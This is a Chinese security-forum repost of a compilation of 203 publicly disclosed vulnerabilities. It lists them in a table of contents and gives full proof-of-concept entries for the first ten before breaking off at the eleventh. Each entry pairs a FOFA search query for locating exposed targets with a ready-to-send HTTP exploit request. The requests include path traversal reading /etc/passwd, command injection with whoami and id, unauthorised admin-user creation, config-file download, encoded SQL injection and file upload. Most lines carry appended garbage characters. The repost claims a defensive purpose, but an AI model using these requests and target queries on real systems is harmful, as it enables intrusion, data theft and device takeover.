中国网络渗透测试联盟

标题: 互联网公开漏洞整理202309-202406--转载 [打印本页]

作者: admin 时间: 2024-6-5 14:31
标题: 互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-202406; w  t) V* F8 {9 B$ h* X
道一安全 2024-06-05 07:41 北京
3 r$ ~- t/ ]- p/ o- l( u& {' n8 Q9 F以下文章来源于网络安全新视界，作者网络安全新视界# ~0 `$ x0 ~% [
+ `4 j* G$ ]4 [1 m" h) t8 a$ U, R
发文目的：Nday漏洞的利用是安全攻防占比较大的攻击方式，希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
* g. ?9 A, Q6 G! |) ]2 H0 {# g6 \! p0 u3 c9 y3 M
漏洞来源：文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个，均来自于互联网其他公众号或者网站，由网络安全新视界团队进行整理发布。( a6 Q7 o$ t# d" a# G
4 Q) A! v) z" Q/ q+ o
安全补丁：所有的漏洞均为公开漏洞，补丁或漏洞修复方案请联系产品厂家。8 I6 r/ [7 K- q7 b

# D8 s7 j4 w2 B6 @* [* C# i1 K文章内容：因受篇幅限制，个别漏洞POC由于过长，统一使用PAYLOAD字样代替，如需完整POC请自行搜索。
* |3 g0 v9 ^. x+ |0 v4 l- y5 P: O6 \1 o& A: n# o; @; d
合法权益：如文章内容侵犯某方合法权益，请后台联系网络安全新视界团队对相关内容进行删除。3 j: ^' F: V' o

  X0 {2 J. V. x  ^# O- d5 q7 I5 K' w4 P. T) {
声明% }  ~! T* e$ R" N) n$ \* {

' B; w  w9 f' Q; T' F3 X* e9 {7 H为简化流程，方便大家翻阅，固不设置“回复再给完整列表”。本文章就是当前最全文章，使用时F12搜索关键词即可。
  }/ _& ]2 x7 g7 A" B% ~, N
  f; g5 l' M; Q8 X* O有需要的可以收藏此文。也可以关注本公众号（网络安全新视界）。
& T, R/ a2 i4 C4 K5 D- _
: Y5 A8 g: [) W6 r  x' z+ Y+ y$ u4 A, y( o

/ f0 ~! T5 s. }) b, K/ e目录
5 ?& F' z3 _! t# T  ^' g
" H# n1 T2 o; N; d+ n015 ?5 ]3 n! e# p' `
- S( \" s" a1 N% |9 N: T; Y. S
1. StarRocks MPP数据库未授权访问
, V* D1 m# g5 h% N  s- |2. Casdoor系统static任意文件读取
6 F) e- y0 b- R! U9 K3. EasyCVR智能边缘网关 userlist 信息泄漏$ M: k! W) g( k0 `3 b% T2 M+ I
4. EasyCVR视频管理平台存在任意用户添加
3 y! z7 B3 q9 Y) w: j  V, Z5. NUUO NVR 视频存储管理设备远程命令执行$ T; _( h$ v4 S) ~- l/ ?
6. 深信服 NGAF 任意文件读取% Z# ?  G, {% Q1 N1 ^  L
7. 鸿运主动安全监控云平台任意文件下载. Y/ n4 q- R2 m5 \% A9 J. k# A
8. 斐讯 Phicomm 路由器RCE  p5 a' L: a9 I2 z9 v+ r' r& @
9. 稻壳CMS keyword 未授权SQL注入
$ z% H2 p" I8 B10. 蓝凌EIS智慧协同平台api.aspx任意文件上传; t) _3 a3 @! a
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
0 V- |6 j2 W: p5 d9 _7 B3 J12. Jorani < 1.0.2 远程命令执行3 Q9 T' @* }  A" O! N% w& G& P( T1 q
13. 红帆iOffice ioFileDown任意文件读取
7 {9 H& |, l! N14. 华夏ERP（jshERP）敏感信息泄露2 g, F" Q- ?& U7 F$ S# d
15. 华夏ERP getAllList信息泄露* d" U: v7 u1 Z
16. 红帆HFOffice医微云SQL注入- W% z7 Y# X: ?; P4 l
17. 大华 DSS itcBulletin SQL 注入# _6 z& r9 q+ B  i; O
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
2 X7 E* G" i# ?/ K19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入) I: K' J( w* J( s' b
20. 大华ICC智能物联综合管理平台任意文件读取* v' K4 R4 B+ o) k6 G
21. 大华ICC智能物联综合管理平台random远程代码执行
( L6 F$ O# }3 H8 w- p' j5 M5 }' a& F22. 大华ICC智能物联综合管理平台 log4j远程代码执行' }. `5 x) X8 y1 v. _& q" M: T
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
3 Z; D6 n9 `- C& t6 N4 t2 Q4 ]24. 用友NC 6.5 accept.jsp任意文件上传
8 g  }! v5 n& G- D8 H25. 用友NC registerServlet JNDI 远程代码执行2 g3 d7 W/ O/ a4 Y! r
26. 用友NC linkVoucher SQL注入
: M" f6 f% ]# `8 |' A$ b7 j# [27. 用友 NC showcontent SQL注入) }* a: W' O* S$ g
28. 用友NC grouptemplet 任意文件上传- o# d$ ~' C: H" K! ^* [, ]
29. 用友NC down/bill SQL注入2 A* Y+ ~5 b% b4 ?
30. 用友NC importPml SQL注入" v; j7 r7 V5 L) k% g
31. 用友NC runStateServlet SQL注入
! e8 z2 }: G* Y4 t9 J' g32. 用友NC complainbilldetail SQL注入- g4 c/ O' n1 E1 Q
33. 用友NC downTax/download SQL注入
7 [. c5 ?: A$ S' T& E) H34. 用友NC warningDetailInfo接口SQL注入
( c& w) L2 p7 F9 M* Q2 X. Q# @- Z35. 用友NC-Cloud importhttpscer任意文件上传+ m# e8 M( q# l" e
36. 用友NC-Cloud soapFormat XXE
# B. c9 T; w0 g% \9 f37. 用友NC-Cloud IUpdateService XXE! l" E" b5 J, q
38. 用友U8 Cloud smartweb2.RPC.d XXE0 M% a9 a4 @& \: X4 q
39. 用友U8 Cloud RegisterServlet SQL注入
  b* w# x8 O. `40. 用友U8-Cloud XChangeServlet XXE
, o* g7 {8 z8 N+ s2 |' _  N41. 用友U8 Cloud MeasureQueryByToolAction SQL注入, y6 h+ ^( q% D, \* V" D; {$ J+ Z
42. 用友GRP-U8 SmartUpload01 文件上传
9 _0 i* m( {/ e  M" e: Z43. 用友GRP-U8 userInfoWeb SQL注入致RCE
2 D0 _( g1 Q; Y. f8 p  J, W44. 用友GRP-U8 bx_dj_check.jsp SQL注入, E; m% u4 x; j2 O- h: l- h
45. 用友GRP-U8 ufgovbank XXE: q3 ^$ M, C1 l- B! i5 N
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
) Y6 D( \% }8 k3 C47. 用友GRP A++Cloud 政府财务云任意文件读取
/ D# |+ I$ ^/ @2 ?2 l48. 用友U8 CRM swfupload 任意文件上传
' q; r$ {  N8 H% i49. 用友U8 CRM系统uploadfile.php接口任意文件上传5 w* q( A+ {: ~; b: z
50. QDocs Smart School 6.4.1 filterRecords SQL注入0 E' S+ q# F9 m+ N7 ], r" V
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入2 `( B" s# W0 d) L, ^( G
52. 泛微E-Office json_common.php sql注入
. `7 ?' h. ]0 d( O1 a" e53. 迪普 DPTech VPN Service 任意文件上传8 U6 U# `7 J4 w( O, ~& F
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
; O. l+ }0 P" b1 n55. 畅捷通T+ getdecallusers信息泄露' S1 b+ X$ ^! D$ ]5 U8 `
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
% A6 X: }/ d- L+ i! Z! O57. 畅捷通T+ keyEdit.aspx SQL注入
# B: f7 }/ T  w( V58. 畅捷通T+ KeyInfoList.aspx sql注入
; m9 J- }+ v4 _5 ~59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行% l. f+ A0 }+ b& Z5 I( A
60. 百卓Smart管理平台 importexport.php SQL注入0 r) v6 ^: L4 g: ^1 O) I7 i! d1 c
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
! R  M" t" P; h% E7 j  }# Y) E" v62. IP-guard WebServer 远程命令执行
; q8 A7 b" P1 }. `; c' O& {63. IP-guard WebServer任意文件读取8 B1 W2 m9 {2 B  |
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过0 q3 _( Z4 i1 R5 _; q
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入  a1 S, s; u5 }" S+ c7 j7 L  F
67. 万户ezOFFICE wpsservlet任意文件上传
  ?1 ]! c0 L9 d5 n' g0 |68. 万户ezOFFICE wf_printnum.jsp SQL注入
0 d' T+ a, E, L( ^6 D69. 万户 ezOFFICE contract_gd.jsp SQL注入/ q& F, h! Q" _
70. 万户ezEIP success 命令执行1 H# {$ V9 G( s' M( P
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
8 ^! D% K# r' \- I72. 致远OA getAjaxDataServlet XXE
3 a. i2 y8 @1 v' x! ^73. GeoServer wms远程代码执行
/ d. D* d, W6 c9 G+ m  k74. 致远M3-server 6_1sp1 反序列化RCE
( I* p5 Y1 q& D- x+ o4 V; O& Y75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE2 j% E$ d0 p1 a) C
76. 新开普掌上校园服务管理平台service.action远程命令执行
" S! h1 ^3 M$ z77. F22服装管理软件系统UploadHandler.ashx任意文件上传& z' }- z$ ]- i( p
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传& }( T& f7 _8 K, t+ O
79. BYTEVALUE 百为流控路由器远程命令执行
7 I+ d8 h; Y  Y/ n( z- b80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传) h  l3 S! W$ U
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
" z  y8 x; j$ M9 [+ k82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
0 ~( Z1 W8 [8 m" b- S5 Q83. JeecgBoot testConnection 远程命令执行& D6 d; P4 E1 O: g$ J
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入. b  ^9 i  ?+ b& |7 m8 R+ q* K4 G
85. SysAid On-premise< 23.3.36远程代码执行
! q# `2 t  s5 h) `; {- A5 `" N; ^86. 日本tosei自助洗衣机RCE" r+ g$ b/ ]/ T+ }2 q
87. 安恒明御安全网关aaa_local_web_preview文件上传
# {8 I2 p2 @/ o+ V6 s( L+ C: g88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行* B7 I) ^. ]" }) H; q- S
89. 致远互联FE协作办公平台editflow_manager存在sql注入. \( J6 {9 f6 L5 F2 m, ]' o! L# ]
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行4 z/ ~& b5 X$ I; q
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取2 `: T6 M" q! }) d/ V
92. 海康威视运行管理中心session命令执行
, w" _0 d/ q7 j: j/ b- \1 E( L9 L' V2 p93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传7 w2 |, y8 X% `) v$ b
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传- i4 h$ h  @/ l5 L5 m' J, ]
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
: Y8 m3 f! D" Z96. Apache OFBiz  18.12.11 groovy 远程代码执行9 K% ~5 ]- ^" Q" u4 F
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
% U) p. T1 W1 ?9 _  Z6 L98. SpiderFlow爬虫平台远程命令执行. W8 u( S$ ~) h* M8 a& }! Y& |
99. Ncast盈可视高清智能录播系统busiFacade RCE
0 c! h& Y5 [, w& x) M100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传$ v2 S" D' m  X3 O6 @0 t
101. ivanti policy secure-22.6命令注入2 d6 W' n: A" E4 _3 B
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行4 U, Y4 ~# K; m# p: G- B$ f
103. Ivanti Pulse Connect Secure VPN XXE* B6 B+ M+ ?: ?6 m- e0 Y
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
  z# n* Q! K5 z7 o; W4 i105. SpringBlade v3.2.0 export-user SQL 注入3 k! c' M- h9 ^, ?" t  n
106. SpringBlade dict-biz/list SQL 注入
! G* q7 u6 v( t. ?) o+ I) |107. SpringBlade tenant/list SQL 注入( a* X8 L; @/ e; u( J8 f
108. D-Tale 3.9.0 SSRF& Z0 }& q) ?8 Q) o2 ~4 T
109. Jenkins CLI 任意文件读取$ y" @3 C+ a, _( e7 T3 ]: y& F, i' i
110. Goanywhere MFT 未授权创建管理员+ H/ y/ H6 [8 r' `* X
111. WordPress Plugin HTML5 Video Player SQL注入  _5 O& k* g$ f# a; @2 \0 P1 U* ]
112. WordPress Plugin NotificationX SQL 注入5 e) Y0 ?6 M% J$ U
113. WordPress Automatic 插件任意文件下载和SSRF
5 O0 N5 D! s9 b4 T114. WordPress MasterStudy LMS插件 SQL注入! o% `& Z) u! l6 M. [2 M+ D
115. WordPress Bricks Builder <= 1.9.6 RCE
+ x! G6 y$ ]; u: u1 Y( F' H116. wordpress js-support-ticket文件上传2 a1 d# g1 f6 l2 P  ]& l$ R
117. WordPress LayerSlider插件SQL注入1 h; o" g2 s" h- s! n
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
; u: I1 }% y3 H, w& P+ [9 r/ a119. 北京百绰智能S20后台sysmanageajax.php sql注入
' |$ L! L* A: X4 g, C7 H8 f120. 北京百绰智能S40管理平台导入web.php任意文件上传
$ m5 V! l6 p, {6 y; c, z121. 北京百绰智能S42管理平台userattestation.php任意文件上传
3 R/ Z9 R, h. P122. 北京百绰智能s200管理平台/importexport.php sql注入& P( ]% [; N( d) N
123. Atlassian Confluence 模板注入代码执行
' C; `# K# ]" o# V4 n0 Y- Z( o( S124. 湖南建研工程质量检测系统任意文件上传
0 H) D4 F6 O8 v% J: U125. ConnectWise ScreenConnect身份验证绕过
2 w, M' X7 I( i# Z3 `' {2 f' h126. Aiohttp 路径遍历
3 u! g; E& b5 Q127. 广联达Linkworks DataExchange.ashx XXE0 Y% W5 P% {1 d# L7 k# d
128. Adobe ColdFusion 反序列化8 @& K, `8 P& i$ B' C
129. Adobe ColdFusion 任意文件读取
; z* `" r  G! \2 L130. Laykefu客服系统任意文件上传
3 _4 t, g+ N" a, K, K' n! }& I1 `131. Mini-Tmall <=20231017 SQL注入0 b  X- x; ]* I1 X
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过3 d% m% A2 P. n
133. H5 云商城 file.php 文件上传
( i, I) x& z# l134. 网康NS-ASG应用安全网关index.php sql注入# b/ w& @1 Z; {0 o
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
+ ]. X( L+ C8 [8 Y+ l5 J  R7 I136. NextChat cors SSRF5 A! Z5 m5 B) ^  b5 e
137. 福建科立迅通信指挥调度平台down_file.php sql注入
) Y4 W) x. f4 V$ d138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
4 u- N' \1 b8 ~139. 福建科立讯通信指挥调度平台editemedia.php sql注入
% N: f% k- u1 i2 {- `140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
# M$ ~. F2 I) ?# D141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入, Y4 E# P: w; j* p
142. CMSV6车辆监控平台系统中存在弱密码
4 K6 h! M4 J/ G  G( ]4 i% }  |143. Netis WF2780 v2.1.40144 远程命令执行
2 @* p) `6 S% {- r( v" Q144. D-Link nas_sharing.cgi 命令注入% l: Z/ L- o8 a
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
5 F0 j4 M  _$ L2 [  w4 ]6 G, H4 `146. MajorDoMo thumb.php 未授权远程代码执行
6 O3 O- x4 A: ]) V3 O9 p3 N7 L) j% r147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
+ C9 M, Z2 g# C% p! }4 k148. CrushFTP 认证绕过模板注入0 c9 @5 T# k8 S1 U' V& ^* _- F7 O$ H
149. AJ-Report开源数据大屏存在远程命令执行' ~* ~8 b6 {( q4 Z6 [7 D
150. AJ-Report 1.4.0 认证绕过与远程代码执行
7 ?0 _+ L6 h# _4 F* T151. AJ-Report 1.4.1 pageList sql注入& x! P( G5 U" M& Q! K
152. Progress Kemp LoadMaster 远程命令执行
6 r) ^8 c: D. C: y2 W9 M1 `153. gradio任意文件读取; e! Z( ~: F( E+ H' ^8 l% Z
154. 天维尔消防救援作战调度平台 SQL注入) g, q+ n* }! l5 L- s% m
155. 六零导航页 file.php 任意文件上传
0 T: y7 H5 G" W/ n' I156. TBK DVR-4104/DVR-4216 操作系统命令注入
9 Z6 i9 u/ {" ^157. 美特CRM upload.jsp 任意文件上传
2 M* I" P0 R. f$ {158. Mura-CMS-processAsyncObject存在SQL注入/ q' L% F4 r' Y7 k& Z
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传1 V1 d- o" W" C" p, `
160. Sonatype Nexus Repository 3目录遍历与文件读取
- E1 `: p" s7 n& S161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
& b5 o8 P& v2 q- L3 h162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
7 n- b; }; T/ ?6 S4 K7 ?+ c163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
" g  [3 ~$ o' D) q# q9 l1 n164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传6 N- L+ g7 H4 l1 r8 z- r
165. OrangeHRM 3.3.3 SQL 注入
; L! q  }! Z& a166. 中成科信票务管理平台SeatMapHandler SQL注入
& \: V9 r/ _5 m$ o4 o% S9 L/ U167. 精益价值管理系统 DownLoad.aspx任意文件读取- M1 D. O. }' k+ v# C' f( Z
168. 宏景EHR OutputCode 任意文件读取: x" W% I0 K+ |! D
169. 宏景EHR downlawbase SQL注入
: u3 h8 r& j6 j+ z" S8 L/ G170. 宏景EHR DisplayExcelCustomReport 任意文件读取
3 }" Q+ @" [7 S7 T+ Y# g2 o171. 通天星CMSV6车载定位监控平台 SQL注入
! H$ x7 T7 T6 _. L8 b" G8 }172. DT-高清车牌识别摄像机任意文件读取
+ m, i" O7 q7 B  \+ F7 a' w- R173. Check Point 安全网关任意文件读取- w/ a* C, _& k+ {
174. 金和OA C6 FileDownLoad.aspx 任意文件读取$ T) b3 _" s5 K% I: B5 R
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
1 J3 v1 S' U7 J; X. P" V176. 电信网关配置管理系统 rewrite.php 文件上传6 m+ n8 X8 s2 ^  n8 t
177. H3C路由器敏感信息泄露; T4 ?1 k" m# z4 D) E
178. H3C校园网自助服务系统-flexfileupload-任意文件上传) G  I( h8 I! ^& C
179. 建文工程管理系统存在任意文件读取
; a. v# D' S$ i2 m* _( F180. 帮管客 CRM jiliyu SQL注入; E/ o- ]( E1 Z7 \
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
$ W! J9 R2 o- t: e1 f( @% t. e! u182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
8 ~3 L' l7 p# @& w; d. l183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入& w& z6 W# l$ \2 D* V( O, d( a
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
# ?2 i2 W5 N% T185. 瑞友天翼应用虚拟化系统SQL注入
$ S/ v5 Z6 G& ^2 E8 T4 _7 l186. F-logic DataCube3 SQL注入- S" z1 l) A  v& t" b1 A
187. Mura CMS processAsyncObject SQL注入
& \, E% U0 s" A188. 叁体-佳会视频会议 attachment 任意文件读取6 n7 J4 V2 c1 Q0 s4 L( S
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
8 @- T8 R3 g. L+ ~190. 短视频矩阵营销系统 poihuoqu 任意文件读取5 h/ S1 Z7 D6 ^* t- R7 v
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
7 ?& M, ?- q; U/ ]192. 富通天下外贸ERP UploadEmailAttr 任意文件上传1 b; z4 x2 [9 b3 m6 L
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
8 R- k( y8 n9 K: x& V, G. U194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
6 N  D( L# \" X1 X3 l/ J+ M6 Z" V195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
8 D$ X- J3 S, O196. 河南省风速科技统一认证平台密码重置& P, t) @: f9 }' q
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入, a6 ]9 d) H! h
198.  阿里云盘 WebDAV 命令注入3 L, P& a( k2 o
199. cockpit系统assetsmanager_upload接口文件上传
- ~" u- o& n4 a9 c' h200. SeaCMS海洋影视管理系统dmku SQL注入
- N- U, P% C: E1 r201. 方正全媒体新闻采编系统 binary SQL注入
4 y( m9 f+ g. @0 U( R/ h/ U202. 微擎系统 AccountEdit任意文件上传
$ p  D* x/ W; C/ o" _/ x203. 红海云EHR PtFjk 文件上传
. _1 H& w; ~& Y) L. Y4 b; M: {- x1 }6 m; z6 Y/ Q
POC列表
, W. r. {( ?! x, m4 `5 m7 \
( d# W. S; m" d1 B" w' L' h02
) c5 r+ p4 X+ T# N8 e
, U6 W8 t1 O. S: X# V; |1. StarRocks MPP数据库未授权访问% r8 E2 R7 n- l
FOFA ：title="StarRocks"
1 R' e+ u8 n6 X; t3 lGET /mem_tracker HTTP/1.1
/ Z/ v9 A! \1 ]  m7 X0 kHost: URL( s( p6 A1 M  N, j: [
+ s8 X% Q& Y+ V# ^9 g7 m2 D

3 ~* e6 c, f+ I6 K7 M2. Casdoor系统static任意文件读取5 u. F3 I# ?5 d5 ^9 q( B! \( k  f
FOFA ：title="Casdoor"# h- K. }% \. V8 _$ S! H" U8 \
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.15 b9 D# U# b3 z) d" z6 o
Host: xx.xx.xx.xx:9999' U2 U. g& i; l3 V9 t  U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. g8 |) K, X3 I% q" m* F( J. ^1 U8 pConnection: close
: o5 _/ V0 n1 mAccept: */*8 x1 F" _1 R3 M7 p1 q( o1 p
Accept-Language: en1 ~9 w% ?7 K4 v, `* |. X" p
Accept-Encoding: gzip& J/ p$ }, D$ Y

0 k8 Z' D. A6 L- N$ [% \7 p% |6 [, E' Y; D" X
3. EasyCVR智能边缘网关 userlist 信息泄漏! T( M. Z5 L0 B$ {& c8 \
FOFA ：title="EasyCVR"
' t* ]0 b1 n; `% kGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1" C! V8 @' s1 s
Host: xx.xx.xx.xx
3 h0 P/ g- C( k" r6 e, M$ t& U1 Q/ L' @" G! ?5 \
7 L" Y4 A0 }# [! K
4. EasyCVR视频管理平台存在任意用户添加. i) J- o: `3 K- j6 g1 L
FOFA ：title="EasyCVR"& A# r; S3 ^, z8 E2 G4 ?

4 R  D( r* b& d& Z7 l. Cpassword更改为自己的密码md5
1 a( z# T5 N8 ~POST /api/v1/adduser HTTP/1.13 ~  H2 m4 W! U3 @' o
Host: your-ip6 M& n* Q3 C4 x2 N5 P; |
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
" ^1 X9 c" j/ r
, Q) B7 S1 e& F: T& d7 iname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
; U( d' n7 b- E, k* ^. r* z2 Q+ f" H  |

6 m7 ]: X1 X' T1 q  J, Q& e- C; k5. NUUO NVR 视频存储管理设备远程命令执行8 e* }' |( p) D
FOFA：title="Network Video Recorder Login"
$ l8 ?9 v0 L+ N- _GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
; I6 r8 Q% O  ~/ J. r9 RHost: xx.xx.xx.xx
& C; a- j( H! X6 B2 q
  S/ e2 d  V4 y! ~& r
/ \3 D9 y1 ^( S2 M; R9 Y6. 深信服 NGAF 任意文件读取( l! `- f/ o/ E( g. N% ^
FOFA：title="SANGFOR | NGAF"
6 t9 f) ~6 X5 z2 A  BGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1  k3 V3 k' A( G& a; i
Host:
: K5 ]: C! C" [& d! U/ _( ]- D7 C

9 L( C7 Z  q* w& p. n1 h7. 鸿运主动安全监控云平台任意文件下载. h) j1 J: k- g$ L
FOFA：body="./open/webApi.html"4 ^: r  `1 [( B
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
7 J- y* w3 Y5 D" A3 V" VHost:
; q# L+ ]& m% W$ {$ |7 [1 B: w2 x( ?1 L' |# K5 ]9 C

" m4 F1 i2 z. N, V, ~6 E6 ^8. 斐讯 Phicomm 路由器RCE2 E+ M8 d/ d4 D; r
FOFA：icon_hash="-1344736688"0 v* I5 c3 F+ i: r# o& G6 w
默认账号admin登录后台后，执行操作
- f) f) Q$ Y- a0 r8 m( d; uPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.19 G, f4 e8 v* D7 R
Host: x.x.x.x: U" X$ F2 H3 X9 {/ W$ N
Cookie: sysauth=第一步登录获取的cookie' R/ r! v- @7 D5 @* p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz5 m! m2 m2 z: H# n* y3 `* S9 H% {  E
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36  A# E- `% C; r' m' O
6 y1 n7 W2 K! w; [
------WebKitFormBoundaryxbgjoytz' `3 O: a1 V% S9 R; ~1 f1 d" M! S
Content-Disposition: form-data; name="wifiRebootEnablestatus"
2 `4 ]1 @! s/ Y: {0 ~2 b; b
! s- k1 S2 l" H+ |0 j: _7 r& n%s
" m( B( Y) O9 |! G" m4 |- s; E------WebKitFormBoundaryxbgjoytz
2 D( H$ m4 q* x/ Z3 x4 TContent-Disposition: form-data; name="wifiRebootrange"* X! s5 J4 ?& G

9 W7 `3 N  F2 z  |$ B12:00; id;; S! H6 s$ N6 _! b$ _
------WebKitFormBoundaryxbgjoytz3 O- S! _. U) P% @  S9 O3 m2 k" h
Content-Disposition: form-data; name="wifiRebootendrange"
% }3 H: P2 A, V1 o
; ]$ A, t- b7 _%s:
4 ^* l7 G) h) f/ D) l6 f------WebKitFormBoundaryxbgjoytz; J" r# @( F( T: s
Content-Disposition: form-data; name="cururl2"/ W0 d" P* S) J# n% Q
1 a! z3 d- [# R: `! W- l* B3 a
! z( u5 Z) M- |1 L% O# g9 R+ Z- C
------WebKitFormBoundaryxbgjoytz--
/ P( \* e& c# I3 M$ H, b! h, N/ V- H5 y$ b
( M% f3 W; [0 G3 E% U
9. 稻壳CMS keyword 未授权SQL注入6 J$ |9 D6 U$ E, X& Q
FOFA：app="Doccms"
+ e. V) F+ j% e: I1 aGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.19 T6 `+ m* t) _8 G
Host: x.x.x.x) O# k  l  Z/ ?" ~, ~% O( f

+ }' _& k& J1 n$ q$ ?' I" p) c5 r) z0 E
payload为下列语句的二次Url编码
# ^8 b7 c3 k+ [
1 s$ A# w9 p( w0 m+ W. F' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
( ]6 h2 d5 \' J( z1 F: w- Q( U3 w% w( H) S5 U, x
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
8 P9 W* X( Z% Z+ OFOFA：icon_hash="953405444"4 J+ E% t# a% @" h+ d0 ^
$ q- L$ ]* G( v6 p! @* S" p
文件上传后响应中包含上传文件的路径  m# Y% i: L3 _; M3 G0 c) }9 x
POST /eis/service/api.aspx?action=saveImg HTTP/1.1' m2 t5 x1 D. i( y* Y( z
Host: x.x.x.x:xx% W5 {6 e1 v  D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
4 T! h3 l7 M# K5 t% aContent-Length: 1977 v) k0 j2 E6 y1 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! ?" w  |+ Z5 h8 h% Y  q, [) X' UAccept-Encoding: gzip, deflate
, E5 I& }$ V+ ?5 oAccept-Language: zh-CN,zh;q=0.90 s! P) s+ X" ^$ B, s  H% v3 h$ o8 J- c. Q
Connection: close
. c6 k4 r' Z+ [2 |8 I# lContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu& ~+ x; C: p" u6 U0 i
/ M+ k% I4 t4 V" q$ x8 b1 k
------WebKitFormBoundaryxdgaqmqu8 l! F$ t* N6 ~
Content-Disposition: form-data; name="file"filename="icfitnya.txt"! \* y# l2 c9 ^4 j' }) Q( [
Content-Type: text/html& j% b) {8 }+ p: d

, K. P& N4 ], o% o, F1 s. ~3 tjmnqjfdsupxgfidopeixbgsxbf
& G. c2 Y* P8 K------WebKitFormBoundaryxdgaqmqu--+ d5 D# y. n4 F+ V
: @* A" Z$ n" Q& i& N5 H# t- C
1 C+ ]) _9 W7 i9 R6 i0 m1 W
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
  @* J9 B( k! O" w$ O1 }9 ^FOFA：icon_hash="953405444" || app="Landray-EIS智慧协同平台"
